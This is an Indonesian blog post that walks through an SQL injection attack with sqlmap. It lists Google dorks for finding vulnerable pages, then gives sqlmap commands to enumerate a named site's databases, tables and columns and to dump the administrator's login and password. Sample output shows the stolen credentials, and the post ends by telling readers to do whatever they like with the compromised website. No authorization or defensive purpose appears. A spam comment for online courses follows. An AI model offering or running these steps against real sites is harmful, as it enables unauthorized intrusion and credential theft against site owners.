Jumat, 28 Juni 2013

Sql Injection Menggunakan Sqlmap



ok langsung saja, tidak perlu banyak basa-basi lagi.

Cari target menggunakan google dorks:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=

dan masih banyak lagi yang lainnya. Jika target sudah di temukan, buka sqlmap, lokasinya di: 
Application – Backtrack – Exploitation Tools – Web Exploitation Tools – Sqlmap

Pentest target menggunakan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 --dbs

-u = url
--dbs = untuk mencari database

Output:
available databases [2]:
[*] dede
[*] information_schema

Jika sudah menemukan databasenya, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede --tables 

-D = nama database yang kita temukan tadi
--tables = mencari nama tables
Output:
Database: dede
[3 tables]
+------------------------------+
| access_log               |
| administrators        |
|  menus                     |

Jika sudah menemukan nama tables, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators --columns

-T = nama tables
--columns = mencari nama columns

Output:
[2 columns]
+--------------+--------------+
| Column       | Type    |
+--------------+--------------+
| admin_login  | text |
| admin_passwd  | text |

Jika sudah menemukan nama columns, lanjut dengan cara berikut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_login --dump

Output:
+--+
| admin-login |
+--+
|dedetampan|

Jika sudah mendapatkan nama username, lanjut dengan mencari password dari username tersebut:
python sqlmap.py -u http://www.dedetampan.com/catalog.php?id=129 -D dede -T administrators -C admin_passwd --dump

Output:
+--+
| admin-passwd |
+--+
|tb-cyber|
nah kalau sudah begini, sekarang terserah kalian mau di buat apa website tersebut ^_^




Sumber : http://dedekpli.blogspot.com/2011/11/sql-injection-with-sqlmap.html

1 komentar:

  1. Teman - teman kesulitan untuk Belajar Komputer karena kesibukan? kini kami memfasilitasi kursus komputer jarak jauh via online, silahkan kunjungi website kami di asianbrilliant.com, Master Komputer, Kursus Online

    Ayah, Bunda..butuh guru untuk mengajar anak-anak dirumah ? kami memfasilitasi 1000 guru untuk anak-anak ayah dan bunda datang kerumah, silahkan kunjungi website kami di smartsukses.com, Bimbingan Belajar, Les Private

    BalasHapus